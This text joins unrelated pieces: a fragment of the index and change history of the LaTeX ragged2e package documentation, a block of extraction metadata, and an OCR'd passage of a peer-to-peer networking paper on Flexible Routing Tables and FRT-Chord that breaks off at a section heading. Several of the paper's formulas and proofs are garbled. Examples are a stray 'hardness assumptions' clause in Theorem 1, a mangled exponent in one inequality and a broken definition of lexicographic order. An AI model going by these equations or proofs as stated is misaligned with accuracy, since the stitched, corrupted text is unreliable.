\RaggedLeftParfillskip ............. 4, 99, 121, 134, 192
\RaggedLeftParindent ....... 4, 99, 124, 137, 193
\RaggedLeftRightskip ............. 4, 99, 118, 131, 190
\RaggedRight ............. 3, 60, 74, 167, 229, 252
\raggedright ............. 3, 13, 249, 252
\RaggedRightLeftskip ............. 4, 99, 116, 129, 202
\RaggedRightParfillskip ............. 4, 99, 122, 135, 205
\RaggedRightParindent ....... 4, 99, 125, 138, 206
\RaggedRightRightskip ............. 4, 99, 119, 132, 203
\relax ............. 16, 19, 65, 76, 82, 93, 145, 223, 229, 235, 241
\renewcommand ........... 50
\RequirePackage .......... 95, 97
\reserved@e ............ 165, 167
\reserved@f ............ 165, 167
\rightskip ............ 6, 14, 19, 44, 178, 191, 204, 215
S
\sloppy ............ 49, 64
\spaceskip ............ 15, 146, 148, 151
\string ............. 73
T
\thr@@ ............. 145
\trivlist ............. 222, 228, 234, 240
\tt ............. 18
\ttraggedright ............. 17
\tw@ ............. 127, 128, 130, 132, 148
U
\unskip ............. 163
\xspaceskip ............. 16
X
\z@skip ............. 7, 9, 14, 19, 40, 43, 59, 123, 124, 125, 127, 128, 130, 132, 136, 137, 138, 145, 146, 151, 167, 213, 214
\z@skip ............. 8, 40, 44, 56, 116, 118, 120, 121, 129, 131, 133, 134
\Z ............. 7, 9, 14,
Change History
v1.00
General: New from \raggedright V 1.21 ................................. 1
v1.01
General: Documentation improved ................................. 1
v1.02
General: Moved to LPPL ............................................ 1
v2.00
\@raggedtwoe@abedhook: New macro ................................. 9
\@raggedtwoe@document@opt: New macro ............................. 9
\@raggedtwoe@everyselectfont: Completely redesigned and removed
\RaggedSpaceskip and \RaggedXSpaceskip ......................... 11
\@raggedtwoe@gnewline: New macro ................................. 12
\@raggedtwoe@raggedrightboxes@opt: New macro .................... 7
\@raggedtwoe@saved@gnewline: New macro ............................ 12
\Centering: Call \@raggedtwoe@everyselectfont and switch
\gnewline ......................................................... 13
\JustifyingParfillskip: New macro ................................. 10
\JustifyingParindent: New macro ................................. 10
\RaggedLeft: Call \@raggedtwoe@everyselectfont and switch
\gnewline ......................................................... 13
\RaggedRight: Call \@raggedtwoe@everyselectfont and switch
\gnewline ......................................................... 13
\if@raggedtwoe@footmisc: New macro ................................. 7
\justifying: New macro ............................................. 13
General: Allow all-lowercase versions of options .................. 7
Allow all-lowercase versions of options and removed documentation of
mixed-case versions. ............................................. 5
Incorporated \raggedr ................................................. 1
Load the \footmisc package ........................................... 9
New command \justifying ............................................. 3
New environment justify ............................................. 5
New option document ................................................. 6, 8
New option footnotes ................................................. 6, 8
New option raggedrightboxes ......................................... 6, 7
Pass all other options to \footmisc if it’s loaded ................. 9
Removed \RaggedSpaceskip and \RaggedXSpaceskip .................. 3, 10
Removed spaces and unneeded braces from \setlength; replaced plus
with \@plus ..................................................... 6
justify: New environment ............................................. 14
v2.01 \@raggedtwoe@everyselectfont: Removed the setting of \xspaceskip .......................... 11
v2.02 \@raggedtwoe@gnewline: Bugfix: \@nolerr \rightarrow \@nolnerr ................................. 12
General: Bugfix: \if@raggedtwoe@footmisc@true \rightarrow
\@raggedtwoe@footmisc@true ..................................... 8
Removed \setlength .................................................. 8
Use \@flushglue ..................................................... 6
FlushRight: Use \trivlist \ldots \endtrivlist instead of
\begin{trivlist} \ldots \end{trivlist} ............................. 14
justify: Use \trivlist \ldots \endtrivlist instead of \begin{trivlist}
\ldots \end{trivlist} ............................................. 14
v2.03
General: Bugfix: footnotes was actually raggedrightboxes .................... 8
v2.04
\raggedtwoe@abdhook: Set \@tocrmarg and use \PackageInfo .................... 9
\raggedtwoe@everyselectfont: Reset \spaceskip when we are not active ...................... 12
\raggedtwoe@raggedrightboxes@opt: The setting of \parindent is superfluous ..................... 8
General: Initialize \JustifyingParindent with \parindent ..................... 10
Insert missing \ ................................................................. 10
Save more commands ......................................................... 14
v2.1
\raggedtwoe@abdhook: bugfix: Use \@tocrmarg only if it's defined ........... 9
\raggedtwoe@gnewline: Bugfix: handle math .................................... 12
General: bugfix: \Flushleft instead of \FlushLeft (found by Berend Hasselman) .................................................. 14
bugfix: Load footmisc directly and not via \AtEndOfPackage (bug found by Axel Sommerfeldt) ................................................................. 10
document that document needs footmisc ...................................... 6
v2.2
\raggedtwoe@raggedrightboxes@opt: Definition of \Arrayparboxrestore has changed ......................... 7
General: Change maintenance status of package ............................ 2
Move to git/gitlab, use svninfo2 ........................................... 1
Require a new version of \LaTeX(2017/03/29) .................................. 1
v3.0
General: Change maintenance status ............................................ 2
document everyls is obsolete .................................................. 6
v3.00
\raggedtwoe@everyselectfont: Use kernel hook if available .................. 12
General: Remove the everyls package if kernel hooks are available .......... 9
v3.1
\Centering: Robustify the user macros (Thanks to Markus Kohm for the hint) ................................................................. 13
\RaggedLeft: Robustify the user macros ...................................... 13
\RaggedRight: Robustify the user macros (Thanks to Markus Kohm for the hint) ................................................................. 13
\justifying: Robustify the user macros (Thanks to Markus Kohm for the hint) ................................................................. 13
General: Use the updated definition of \raggedright .......................... 2
|
{"Source-Url": "https://ctan.math.utah.edu/ctan/tex-archive/macros/latex/contrib/ragged2e/ragged2e.pdf", "len_cl100k_base": 9691, "olmocr-version": "0.1.50", "pdf-total-pages": 20, "total-fallback-pages": 0, "total-input-tokens": 59936, "total-output-tokens": 11671, "length": "2e13", "weborganizer": {"__label__adult": 0.00025081634521484375, "__label__art_design": 0.0018520355224609375, "__label__crime_law": 0.00017499923706054688, "__label__education_jobs": 0.0005750656127929688, "__label__entertainment": 0.0001373291015625, "__label__fashion_beauty": 0.00012069940567016602, "__label__finance_business": 0.00020372867584228516, "__label__food_dining": 0.00016677379608154297, "__label__games": 0.0005407333374023438, "__label__hardware": 0.00048732757568359375, "__label__health": 0.00011461973190307616, "__label__history": 0.00025725364685058594, "__label__home_hobbies": 0.00010722875595092772, "__label__industrial": 0.00020122528076171875, "__label__literature": 0.0003795623779296875, "__label__politics": 0.0001857280731201172, "__label__religion": 0.0003497600555419922, "__label__science_tech": 0.006500244140625, "__label__social_life": 0.0001036524772644043, "__label__software": 0.066162109375, "__label__software_dev": 0.9208984375, "__label__sports_fitness": 0.0001361370086669922, "__label__transportation": 0.00013816356658935547, "__label__travel": 0.0001704692840576172}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 33548, 0.05876]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 33548, 0.19238]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 33548, 0.53544]], "google_gemma-3-12b-it_contains_pii": [[0, 1176, false], [1176, 3183, null], [3183, 5594, null], [5594, 6956, null], [6956, 7753, null], [7753, 9820, null], [9820, 11842, null], [11842, 12497, null], [12497, 13567, null], [13567, 15041, null], [15041, 16950, null], [16950, 18257, null], [18257, 19860, null], [19860, 20846, null], [20846, 21887, null], [21887, 24938, null], [24938, 24938, null], [24938, 27780, null], [27780, 31062, null], [31062, 33548, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1176, true], [1176, 3183, null], [3183, 5594, null], [5594, 6956, null], [6956, 7753, null], [7753, 9820, null], [9820, 11842, null], [11842, 12497, null], [12497, 13567, null], [13567, 15041, null], [15041, 16950, null], [16950, 18257, null], [18257, 19860, null], [19860, 20846, null], [20846, 21887, null], [21887, 24938, null], [24938, 24938, null], [24938, 27780, null], [27780, 31062, null], [31062, 33548, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 33548, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 33548, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 33548, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 33548, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 33548, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 33548, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 33548, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 33548, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 33548, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 33548, null]], "pdf_page_numbers": [[0, 1176, 1], [1176, 3183, 2], [3183, 5594, 3], [5594, 6956, 4], [6956, 7753, 5], [7753, 9820, 6], [9820, 11842, 7], [11842, 12497, 8], [12497, 13567, 9], [13567, 15041, 10], [15041, 16950, 11], [16950, 18257, 12], [18257, 19860, 13], [19860, 20846, 14], [20846, 21887, 15], [21887, 24938, 16], [24938, 24938, 17], [24938, 27780, 18], [27780, 31062, 19], [31062, 33548, 20]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 33548, 0.04647]]}
|
olmocr_science_pdfs
|
2024-11-28
|
2024-11-28
|
168d6725a6802d28b97e14742069656e3ec19e08
|
Flexible Routing Tables:
Designing Routing Algorithms for Overlays
Based on a Total Order on a Routing Table Set
Hiroya Nagao, Kazuyuki Shudo
Tokyo Institute of Technology, Tokyo, Japan
Email: {hiroya.nagao, shudo}@is.titech.ac.jp
Abstract—This paper presents Flexible Routing Tables (FRT), a method for designing routing algorithms for overlay networks. FRT facilitates extending routing algorithms to reflect factors other than node identifiers.
An FRT-based algorithm defines a total order on the set of all patterns of a routing table, and performs identifier-based routing according to that order. The algorithm gradually refines its routing table along the order by three operations: guarantee of reachability, entry learning, and entry filtering.
This paper presents FRT-Chord, an FRT-based distributed hash table, and gives proof that it achieves $O(\log N)$-hop lookups. Experiments with its implementation show that the routing table refining process proceeds as designed.
Grouped FRT (GFRT), which introduces node groups into FRT, is also presented to demonstrate FRT’s flexibility. GFRT-Chord resulted in a smaller numbers of routing hops between node groups than both Chord and FRT-Chord.
I. INTRODUCTION
Numerous distributed hash tables (DHTs) have been proposed and actively researched over the last decade [1]–[7]. DHT routing algorithms provide scalability, fault tolerance, and reliability to overlay networks. Here, we focus on two features lacking in the routing algorithms of existing DHTs.
The first feature is dynamic routing table size. Existing DHTs limit routing table size, in other words the maximum number of routing table entries, to tens or hundreds. DHTs set the limitation because DHTs assume an unreliable, large-scale network such as the Internet, and it is difficult for nodes to maintain all of the millions of other nodes on such a network. Routing algorithms that achieve shorter path lengths with a small routing table have therefore been considered to be better algorithms. It is not always true, however, that the routing table size must be kept small. In OneHop [8] and EpiChord [9], for instance, routing table sizes are large and each routing table maintains a list of all nodes in the network. Moreover, it is difficult to estimate a suitable routing table size because the optimal size depends on node lifespan, node availability, and the number of nodes, all of which may change dynamically while the overlay network evolves and operates. It is therefore necessary to design a routing algorithm that can adapt to any routing table size and change dynamically.
The second feature is a node identifier consideration that does not restrict routing table candidates. Each node has a node identifier, an address in an overlay network, and messages are forwarded according to those identifiers. Routing tables are therefore constructed using node identifiers. Existing routing algorithms reflect node identifiers by restricting routing table candidates to a subset of routing tables with some desirable property, such as $O(\log N)$-hop lookup performance in an $N$-node network. For instance, Chord [1] restricts node identifiers in a routing table at a node $s$ to those nodes that most closely follow $s + 2^i$. Kademlia [5] restricts the number of nodes whose identifiers are $[2^i, 2^{i+1}]$ away from $s$, based on XOR metrics, to be less than a constant $k$. Such restrictions are comprehensible and make data structures and construction processes simple, and are suitable to reflect only node identifiers. Such restrictions cause problems, however, not only in that routing tables do not know all nodes, despite the small number of nodes present, but also in that they eliminate opportunities to consider factors other than node identifiers, making extension of the routing algorithm problematic.
Algorithm extension is a promising approach to overcoming inherent problems in overlays, such as a number of relay nodes and insufficient consideration of network proximity. For instance, LPRS-Chord [10] and Coral [11] reflect network latency in routing tables, and Diminished Chord [12] and GTap [13] reflect node groups. Extendibility is a key property of DHTs and determines what extensions can be implemented. As mentioned above, however, the existing method of considering node identifiers interferes with constructing routing tables that are desirable in terms of such factors. The restriction on routing table candidates poses difficulty in considering factors other than node identifiers. It is difficult to achieve a balance between node identifier considerations and other factor considerations. A scheme of reflecting node identifiers without such restrictions is important for future applications.
As a solution we propose flexible routing tables (FRT), a method for designing routing algorithms for overlay networks. An FRT-based algorithm defines a total order $\leq_{1D}$ as an indicator of the relative merits between node identifier combinations in a routing table, and continuously refines a routing table in accordance with the order. By doing so, the algorithm is able to dynamically change the routing table size and reflect node identifiers.
identifiers in a routing table without restriction on routing table candidates.
FRT has the following features.
Broadening of target domain: A node can route a message in $O(1)$-hop if the node can hold all nodes in an overlay. Otherwise, the algorithm routes messages as multi-hop lookups. The algorithm is also able to continuously change between those lookup styles without knowledge of the number of nodes.
Improved extendability: FRT supports simultaneous consideration of node identifiers and other factors because routing table construction does not restrict candidates for node identifier combinations in a routing table.
Effective utilization of entry information: In existing DHTs, routing tables tend to obtain only entry information needed for an eventual routing table, where entry information is knowledge needed to construct entries. Entry information that is not required, therefore, get ignored. An FRT-based algorithm does not ignore any entry information, and thus is able to construct better routing tables by evaluating all entry information.
Flexibility: An FRT-based algorithm is able to construct situation-dependent routing tables, based on, for example, the number of nodes in the system, node lifespan, node availability, performance requirements, without restriction on routing table size since the routing table is able to be resized dynamically.
Facilitation of node identifier considerations: An FRT-based algorithm expresses the relative merits of node identifier combinations in a routing table by a total order $\leq_{ID}$, and thus the algorithm can consider node identifiers by referring only to an order on the routing table set. As a result, the algorithm is able to easily choose a routing table with more desirable node identifier combinations from among routing table candidates fulfilling complex restrictions on factors other than node identifiers.
Continual extension: FRT is able to continuously extend and improve existing routing algorithms for overlay networks by inserting additional entries into routing tables in the algorithms according to their order, which is defined in advance. FRT-based routing table construction protocols can be designed as extensions of existing algorithms while retaining all entries in the original routing table, and thus, at the least, we can retain the routing efficiency and other features of the original algorithm.
We describe a concrete FRT algorithm by taking FRT-Chord, a DHT we designed based on FRT, as an example. We also implement the proposed algorithm, and perform experiments.
In Section IV, we discuss how to design DHTs for future extension, and the extendibility of DHTs based on FRT.
II. RELATED WORK
A. Chord
Chord is a distributed hash table (DHT), where node identifiers are represented as a circle of natural numbers from 0 to $2^m - 1$ in a clockwise direction ($m$ is a bit length). The identifier space is called a Chord ring. The node responsible for a key is that node whose identifier most closely follows the key, called a successor.
In Chord, each node maintains three routing tables (successor list, predecessor, and finger table). Each entry in the routing tables is a node identifier and IP address pair. A node is able to send messages to another node with a specified node identifier, because the routing tables convert an node identifier to its corresponding IP address.
A successor list at node $s$ contains a certain number of closest nodes from $s$ in the clockwise direction, and a predecessor contains the closest node from $s$ in the anticlockwise direction. These two routing tables are maintained by periodically running a stabilization routine, wherein the node sends messages to the successor for guaranteeing lookup correctness. The $i$ th entry in a finger table is the first node that succeeds $s$ by at least $2^{i-1}$ in the clockwise direction. Using the finger table significantly reduces the remaining distance.
In Chord, the identifier distance from $x$ to $y$, $d(x, y)$, is defined as follows (Fig.1).
$$d(x, y) = \begin{cases}
y - x, & \text{for } x < y \\
2^m, & \text{for } x = y \\
y - x + 2^m, & \text{for } x > y
\end{cases}$$
A query for a key identifier $t$ is forwarded to a node $s'$ in the routing table for which $d(s', t)$ is minimized among any other entries. Routing schemes like this one that repeat forwarding through nearest nodes to a target are called greedy routing schemes. Chord achieves $O(\log N)$-hop lookup performance with $N$ nodes.
B. EpiChord
EpiChord is a DHT in which the number of entries in the routing table is not limited. EpiChord divides the Chord ring into two symmetric sets of exponentially smaller slices, where the number of entries is greater than some constant at all times. This constraint provides an $O(\log N)$-hop guarantee on lookup path length. Such a constraint, however, also restrict candidates for node identifier combinations in routing tables. Although FRT, on the other hand, is able to construct routing tables from among all nodes, and FRT reflects node identifiers without such constraints.
C. Symphony
Symphony [7] is also a DHT using a Chord ring. In Symphony, each node maintains two different entries, short distance links (SDLs) and long distance links (LDLs). SDLs are fixed entries maintained for reachability, namely a successor and a predecessor. Each LDL is determined probabilistically according to an identifier generated by a specific probability distribution based on the Small World phenomenon [14]. It therefore might seem that any node may be selected as an LDL, and that Symphony does not restrict candidates for node identifier combinations. However, each LDL is selected deterministically according to a probabilistically generated identifier, and thus, there is no opportunity to reflect factors other than node identifiers. FRT differs from Symphony in terms of flexibility of entry selections.
III. FRT-CHORD
In this section we describe FRT-Chord, an FRT-based DHT. In FRT-Chord the identifier space is a Chord ring and the node responsible for a key is determined as in Chord. FRT-Chord also performs a greedy routing as in Chord, but the method of routing table construction has some unique features.
In FRT-Chord, each node maintains a single routing table $E$ without distinguishing between successor list, predecessor, and finger table because doing so restricts routing tables. The routing table $E$ is a set of entries \{$e_i$\}$_{i=1}^{\lfloor E \rfloor}$ (see Fig.2). Each entry $e_i$ consists of a node identifier $e_i.id$ and an IP address and a port pair $e_i.addr$ (note that $e_i$ is referred to as $e_i.id$). A routing table \{$e_i$\} at a node $s$ is aligned clockwise from $s$, so it satisfies $i < j \Rightarrow d(s, e_i) < d(s, e_j)$. By this definition, $e_1$ and $e_{\lfloor E \rfloor}$ correspond with a successor and a predecessor, respectively. We assume that the correctness of these entries is guaranteed by the stabilization routine and regard them as sticky entries (Section III-D).
A. $\leq ID$ : Total Order of the Routing Table Set
An FRT-based algorithm defines a total order $\leq ID$ on node identifier combinations in a routing table. The order represents the relative merits between routing tables in terms of node identifiers. The algorithm iteratively refines the routing table according to the order. In this section, we illustrate the design of the order $\leq ID$ in FRT-Chord, and for simplicity we set the length of the equivalent of the successor list to 1.
1) Definition of the Best Routing Table: Let $E.forward(t)$ be an entry in a routing table $E$ to which a query is forwarded at a node $s$ toward a target identifier $t$. The reduction ratio of a forwarding of the query is defined as $d(\text{E.forward}(t), t)/d(s, t)$. This means that the smaller the reduction ratio, the more efficient is the forwarding. Here we will focus on the worst-case reduction ratio $r_i(E)$ of a forwarding to a node $e_i$, other than its predecessor. The reduction ratio of a forwarding to $e_i$ takes the worst-case value when the key identifier $t$ equals $e_{i+1}$ (see Fig.3), so
$$r_i(E) = \frac{d(e_i, e_{i+1})}{d(s, e_{i+1})}, \quad (i = 1, \ldots , \lfloor E \rfloor - 1).$$ \hspace{1cm} (4)
We define the best routing table $\tilde{E} = \{\tilde{e}_i\}$ as follows.
Definition 1: In FRT-Chord, the best routing table $\tilde{E} = \{\tilde{e}_i\}$ minimizes $\max_i \{r_i(E)\}$.
Lemma 1:
$$r_i(\tilde{E}) = 1 - \left( \frac{d(s, \tilde{e}_1)}{d(s, e_{\lfloor E \rfloor})} \right)^{\frac{1}{\lfloor E \rfloor - 1}}.$$ \hspace{1cm} (5)
Proof: From (6), $\max_i \{r_i(E)\}$ takes the minimum value when all of $r_i(E)$ are equal.
$$\prod_{i=1}^{\lfloor E \rfloor - 1} (1 - r_i(E)) = \frac{d(s, e_1)}{d(s, e_{\lfloor E \rfloor})} (\text{const.})$$ \hspace{1cm} (6)
Theorem 1: With high probability (or under standard hardness assumptions), assuming that all nodes have the best routing table with $O(\log N)$ entries in an $N$-node network, path lengths are $O(\log N)$.
Proof: Let $\tilde{E} = \{\tilde{e}\}$ be the best routing table at a node $s$. With high probability, the distance between two generic consecutive nodes is at least $2^m/N^2$ [15], namely
$$d(s, \tilde{e}_1) > \frac{2^m}{N^2}.$$ \hspace{1cm} (7)
The distance between any nodes is at most $2^m$, namely
$$d(s, e_{\lfloor E \rfloor}) < 2^m.$$ \hspace{1cm} (8)
Thus, according to Lemma 1, for any $i = 1, \ldots , \lfloor E \rfloor - 1$,
$$r_i(\tilde{E}) < 1 - \left( \frac{1}{N} \right)^{\frac{2^m}{\lfloor E \rfloor - 1}}.$$ \hspace{1cm} (9)
For $\lfloor E \rfloor = 1 + 2 \log N$, the path length needed to reduce the remaining distance to $2^m/N$ or less is at most
$$\log_{r_i(\tilde{E})} \frac{1}{N} < \log N.$$ \hspace{1cm} (10)
The path length is therefore $O(\log N)$. When the remaining distance is at most $2^m/N$, the number of node identifiers landing in a range of this size is, with high probability, $O(\log N)$.
Proc. 11th IEEE Int'l Conf. on Peer-to-Peer Computing (IEEE P2P’11), pp.72-81, August 2011
Thus the query reaches the key $t$ within another $O(\log N)$ steps, meaning that the entire path length is $O(\log N)$.
2) Definition of $\leq_{1d}$ based on $\tau_i(E)$: In FRT-Chord, the order $\leq_{1d}$ represents an indicator of closeness to the best routing table, and is defined as follows.
Definition 2: Let $\{\tau_i(E)\}$ be the list arranged in descending order of $\{\tau_i(E)\}$.
$$E \leq_{1d} F \iff \{\tau_i(E)\} \leq_{\text{dic}} \{\tau_i(F)\}. \quad (11)$$
In this definition, $\leq_{\text{dic}}$ is a lexicographical order, namely
$$\{a_i\} \leq_{\text{dic}} \{b_i\} \iff \forall k \in \{\min \{i|a_i \neq b_i\}\}$$
$$\{a_i\} \leq_{\text{dic}} \{b_i\} \iff a_i \leq b_i \quad (12)$$
$$\{a_i\} \leq_{\text{dic}} \{b_i\} \iff \exists \{a_i\} \leq_{\text{dic}} \{b_i\} \cup \{a_i\} =_{\text{dic}} \{b_i\}. \quad (13)$$
When we define $\leq_{1d}$ as above, Theorem 2 holds.
Theorem 2: Let $E$ be a candidate for a routing table and $\tilde{E}$ be a best routing table, $E \leq_{1d} \tilde{E}$.
Proof: From Lemma 1 and Definition 2, $\tilde{E}$ is the minimum routing table candidate according to $\leq_{1d}$.
We design an algorithm framework to use the order $\leq_{1d}$ in three parts, guarantee of reachability, entry learning, and entry filtering. FRT-based algorithms consist of these three parts.
B. Guarantee of Reachability
In FRT, all operations to guarantee reachability are called a guarantee of reachability.
FRT-Chord’s guarantee of reachability is a stabilization routine like Chord.
C. Entry Learning
We define entry information as information needed to compose an entry including a node identifier, an IP address, and a port number. In FRT, learning entry information and inserting the entry into a routing table are called entry learning. FRT does not limit how and when learning occurs so that opportunities to refine a routing table will not be wasted.
The following are examples of how FRT learns entries.
1) When a node first joins an overlay, it learns entries by transferring a routing table from a closest node from itself. This transfer is called transfer at join.
2) When a node communicates with another node when routing processes, it learns the connected nodes.
3) Nodes actively look up and learn entries with which they communicate, as in 2). These lookups are called active learning lookups.
In FRT-Chord, active learning lookups are similar to Symphony [7]. A node looks up a key generated from a probability distribution based on identifiers in the best routing table. The probability distribution at a node $s$ is in inverse proportion to the distance from $s$. Letting $d_s(x) = d(s, x)$, the cumulative distribution function $F(x)$ is defined as
$$F(x) = \begin{cases} \frac{\ln d_s(x)}{\ln d_s(e_1)}, & \text{for } d_s(e_1) < x < d_s(e_{|E|}) \quad (15) \\ 0, & \text{for otherwise.} \quad (16) \end{cases}$$
When the probability distribution is defined as above, letting $\text{rnd}$ produce a random number between 0 and 1, the key is generated from the expression:
$$s + d_s(e_1)(d_s(e_{|E|})/d_s(e_1))^{\text{rnd}}. \quad (17)$$
FRT-Chord uses transfers at join. If the need arises, active learning lookups are performed.
In FRT, new entries learned by the above methods are inserted into the routing table. Through repeated entry learning, a node can forward a query to a closer node to a given key. As a separate issue, because the number of entries $|E|$ increases continuously, a node should prune entries at some future time.
FRT-Chord sets a routing table size $L$, the maximum number of entries, to prevent the number of entries from increasing without limit. $L$ is configured dynamically and flexibly, based on the number of entries that should be retained according to node lifetime, machine performance, network latency, and so on.
For instance, if the routing table size $L$ is larger than $N$, the network is stable, routing tables are able to contain all nodes in the system, and the algorithm achieves $O(1)$-hop lookup performance.
D. Entry Filtering
If $L < N$, when $|E|$ exceeds $L$, FRT-Chord will remove either the most recently learned new entry or entries in the current routing table in order to retain $|E| \leq L$.
In FRT, such entry removal operations are called entry filtering. Through continuous entry learning and entry filtering, FRT-based algorithms refine routing tables incrementally according to the order $\leq_{1d}$.
An FRT-based algorithm defines some entries as sticky entries. FRT excludes sticky entries as removal candidates for entry filtering. For example, short distance links (SDLs) are one type of sticky entry. By designating sticky entries, we can easily design a total order $\leq_{1d}$. Entry filtering in FRT is summarized as follows.
1) Substitute entries in $E$ into $C$.
2) Remove sticky entries from $C$.
3) Select an entry from $C$ to refine $E$ according to $\leq_{1d}$.
In this way, FRT can consider node identifiers without restrictions on candidate node identifier combinations in a routing table with order $\leq_{1d}$. We can also extend the algorithm with good results by introducing consideration of factors other than node identifiers when performing entry filtering.
In the rest of this section, we describe FRT-Chord entry filtering in detail.
Let $e_i$ be an entry removed from a routing table $E$ by FRT-Chord’s entry filtering, and $S_i^E$ be a canonical spacing defined as follows (see Fig.4).
Definition 3:
$$S_i^E = \log \frac{d(s, e_{i+1})}{d(s, e_i)}, \quad (i = 1, \ldots, |E|-1) \quad (18)$$
When $S^E_i$ is defined as above, an entry $e_i$ is selected from other than $e_j$ and $e_{\lfloor E \rfloor}$ because these entries are sticky entries, and (19) holds (see Fig.5).
$$S^E_{i-1} + S^E_i \leq S^E_i + S^E_i, \quad (i=2, \ldots, |E| - 1) \quad (19)$$
This way FRT-Chord can search for $i^*$ at low cost by maintaining a list in ascending order of $S^E_{i-1} + S^E_i$, because only constant parts of the list need be changed with each entry learning and entry filtering.
Letting $\{S^E_{(i)}\}$ be the list arranged in descending order of $\{S^E_i\}$, the following lemma holds.
**Lemma 2:**
$$E \leq_{ID} F \iff \{S^E_i\} \leq_{dic} \{S^E_{(i)}\} \quad (20)$$
**Proof:** From the definitions of $r(E)$ and $S^E_i$, we have
$$r(E) = 1 - 2^{-S^E_i} \quad (21)$$
Thus, small and large elements in the lists, $r(E)$ and $S^E_i$, correspond with each other.
**Theorem 3:** In FRT-Chord, let $E \setminus \{e_i\}$ be a routing table filtered by removing $e_i$. For any $e_i (i=2, \ldots, |E| - 1)$,
$$E \setminus \{e_i\} \leq_{ID} E \setminus \{e_i\} \quad (22)$$
**Proof:** By calculating lists $\{S^E_{(i)} \setminus \{e_i\}\}$ and $\{S^E_{(i)} \setminus \{e_i\}\}$, arranged in descending order of the canonical spacings after entry filtering (note that $S^E_{i-1} + \sum_{i=1}^{|E|} S^E_i \leq S^E_i + S^E_i$), the equation $\{S^E_{(i)} \setminus \{e_i\}\} \leq_{dic} \{S^E_{(i)} \setminus \{e_i\}\}$ is derived, and $E \setminus \{e_i\} \leq_{ID} E \setminus \{e_i\}$ holds by Lemma 2.
**Theorem 4:** In FRT-Chord, let $(E \cup \{e_{\text{learn}}\}) \setminus \{e_{\text{filter}}\}$ be a routing table after an entry learning process and a succeeding entry filtering process, where $e_{\text{learn}} \not\in E$ is a learned entry and $e_{\text{filter}} \in (E \cup \{e_{\text{learn}}\}$ is a removed entry in these processes.
$$(E \cup \{e_{\text{learn}}\}) \setminus \{e_{\text{filter}}\} \leq_{ID} E \quad (23)$$
**Proof:** Since $(E \cup \{e_{\text{learn}}\}) \setminus \{e_{\text{learn}}\} = E$,
$$(E \cup \{e_{\text{learn}}\}) \setminus \{e_{\text{learn}}\} \leq_{ID} E \quad (24)$$
According to Theorem 3,
$$(E \cup \{e_{\text{learn}}\}) \setminus \{e_{\text{filter}}\} \leq_{ID} (E \cup \{e_{\text{learn}}\}) \setminus \{e_{\text{learn}}\}. \quad (25)$$
Therefore, since $\leq_{ID}$ is a total order, (23) holds.
**Theorem 4** means that FRT-Chord repeats to refine a routing table by entry learning and entry filtering.
In FRT-Chord, it is possible that routing table refinement through repeated entry learning and entry filtering will stop when any most recently learned entry is selected as an entry to remove. Such a routing table $E$ is called a convergent routing table, and the following theorem holds.
**Theorem 5:** Assuming that all nodes have convergent routing tables with $O(\log N)$ entries in an $N$-nodes network, path lengths are $O(\log N)$ with high probability.
**Proof:** Let $J$ be a set of $i$, where a node exists in a range from $e_i$ to $e_{i+1}$, and $K$ be a set of $i$ otherwise. From the definition of convergent routing tables, for any $j \in J$, when an entry is inserted between $e_j$ and $e_{j+1}$, that entry will be removed, and the following inequality holds.
$$S^E_j \leq S^E_{i-1} + S^E_i, \quad (j \in J, i=2, \ldots, |E| - 1) \quad (26)$$
Thus, by aggregating (26),
$$S^E_j \leq \sum_{i=1}^{|E| - 1} (S^E_{i-1} + S^E_i) \quad (27)$$
$$\leq \frac{2(\sum_{i=1}^{|E| - 1} S^E_i)}{|E| - 2} = \log \left( \frac{d(s, e_{\lfloor E \rfloor})^2}{d(s, e_1)} \right) \quad (28)$$
According to the definitions of $r_j(E)$ and $S^E_i$, we can apply the proof of Theorem 1:
$$r_j(E) < 1 - \left( \frac{1}{N} \right)^{\frac{1}{|E|^2}} \quad (29)$$
When we consider the upper limit of path lengths needed to reduce the remaining distance to $2^m/N$ or less, we must focus on the case where each node forwards to $e_j (j \in J)$, because there is no node between $e_k$ and $e_{k+1}$ and the query forwarding will stop if the query is forwarded to $e_k$.
From (29), path lengths are $O(\log N)$ by similar reasoning to the proof of Theorem 1.
When we wish to set the length of successor lists at $c(>1)$, we need only add the entries as sticky entries. In this case, an entry to remove will be selected optimally by the same filtering method, and routing tables will be refined continuously through entry learning and entry filtering.
As a result, we can summarize entry filtering in FRT-Chord as follows.
1) Substitute entries in $E$ into $C$.
2) Remove sticky entries from $C$.
3) Select the entry $e_i$ from $E$ that minimizes $S^E_{i-1} + S^E_i$.
---
Proc. 11th IEEE Int'l Conf. on Peer-to-Peer Computing (IEEE P2P'11), pp.72-81, August 2011
IV. EXTENSIONS OF FRT
Existing DHTs consider node identifiers by putting restrictions on candidates for node identifier combination in a routing table to make path lengths short such as $O(\log N)$-hop lookup performance. To extend these DHTs, we must either construct routing tables under these restrictions or relax these restrictions altogether, and thus the restrictions too strongly limit opportunities to extend algorithms.
On the other hand, an FRT-based algorithm is able to flexibly reflect factors other than node identifiers in routing table construction, and node identifier consideration follows naturally because the algorithm manifests policies on how to evaluate each routing table according to node identifiers as an order $\leq 1D$. The routing table is refined incrementally in terms of node identifiers even under restriction of factors other than node identifiers. This is the aspect most different from other DHTs.
A. GFRT-Chord
